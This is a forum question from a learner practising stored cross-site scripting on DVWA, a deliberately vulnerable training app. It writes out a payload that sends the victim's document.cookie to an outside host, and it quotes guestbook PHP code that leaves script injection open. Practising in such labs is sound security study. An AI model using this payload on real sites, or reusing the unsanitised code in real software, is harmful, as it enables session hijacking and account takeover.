I am learning about xss exploitation with this web app called damn vulnerable web app found here http://www.dvwa.co.uk/ which intentionally contains web vulnerabilities.
I am trying to add javascript in to a message box like this see image
http://postimg.org/image/w6yeoj331/
It only accepts a certain amount of words and then doesn't allow more than that, which doesn't allow me to continue with the xss attack. I am trying to type this in the message box:
<script>new Image().src="http://192.168.1.14/cookie.php?"+document.cookie;</script>
Here is the php script that deals with the message and name text areas
<?php
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mtxMessage']);
$name = trim($_POST['txtName']);
// Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message);
// Sanitize name input
$name = mysql_real_escape_string($name);
$query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
$result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}
?>
